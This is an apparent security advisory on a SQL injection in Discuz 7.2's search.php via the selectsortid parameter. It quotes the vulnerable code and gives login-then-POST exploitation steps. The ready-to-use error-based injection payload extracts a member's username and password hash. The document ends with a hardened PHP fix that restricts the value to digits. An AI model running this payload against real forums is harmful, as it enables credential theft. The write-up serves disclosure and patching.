Discuz 7.2 /search.php SQL Injection Vulnerability

Published: 2025-04-13
Revised: 2025-04-13

At line 150 of the file /include/search_sort.inc.php:

```php
@include_once DISCUZ_ROOT.'./forumdata/cache/threadsort_'.$selectsortid.'.php';
```

The $selectsortid variable is not processed in any way, and it ends up in the SQL statement at line 170:

```php
$query = $db->query("SELECT tid FROM {$tablepre}optionvalue$selectsortid ".($sqlsrch ? 'WHERE '.$sqlsrch : '').""); 
```

This results in a SQL injection.

Exploitation process

1. Log in to the forum.
2. Visit http://xxxx.com/search.php

POST data:

```
formhash=1&srchtype=threadsort&st=on&sortid=3&searchsubmit=true&selectsortid=3 where tid =1 and (select 1 from (select count(*),concat((select (select (select concat(username,0x3a,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&srcchtxt=aaa 
```

Screenshot: 1.png (https://images.seebug.org/@/uploads/1434683988673-1.png)
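The root cause is that a request value is interpolated into a table name, where no bind parameter can help, so the fix is to constrain the value to the only shape a sort id can have. The following is an added example, not Discuz code, showing a hardened replacement for the two lines quoted above; DISCUZ_ROOT, $tablepre and the $sqlsrch criteria are assumed to exist as in Discuz, and the request values at the bottom are constructed for illustration.

```php
<?php
// Returns the sort id as a positive integer, or null for anything else
// (letters, spaces, SQL fragments), so only digits can be interpolated.
function sanitize_sortid($raw)
{
    $s = is_int($raw) ? (string)$raw : $raw;
    // ctype_digit() rejects signs, whitespace and every non-digit byte,
    // so a value such as "3 where tid = 1 ..." never reaches the query.
    if (!is_string($s) || $s === '' || !ctype_digit($s) || (int)$s <= 0) {
        return null;
    }
    return (int)$s;
}

// Builds the cache-file path and the SQL text for a validated sort id,
// mirroring the original include_once and query lines. Returns null
// when the id is invalid, so the caller can reject the request instead
// of running a query built from attacker-controlled text.
// $sqlsrch is the already-escaped search criteria, as in the original.
function build_threadsort_query($raw_sortid, $tablepre, $sqlsrch = '')
{
    $selectsortid = sanitize_sortid($raw_sortid);
    if ($selectsortid === null) {
        return null;
    }
    $cache = DISCUZ_ROOT . './forumdata/cache/threadsort_' . $selectsortid . '.php';
    $sql = "SELECT tid FROM {$tablepre}optionvalue{$selectsortid}"
         . ($sqlsrch !== '' ? ' WHERE ' . $sqlsrch : '');
    return array('cache' => $cache, 'sql' => $sql);
}

// Constructed values for a stand-alone run (hypothetical root path).
define('DISCUZ_ROOT', __DIR__ . '/');

// A normal sort id: yields the cache path and the query text.
var_dump(build_threadsort_query('3', 'cdb_'));

// The non-numeric value from the PoC above: rejected before any
// file include or query is built.
var_dump(build_threadsort_query('3 where tid =1 and (select 1)', 'cdb_'));
```

In the real code path the caller would stop with an error when the function returns null rather than falling through to $db->query().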
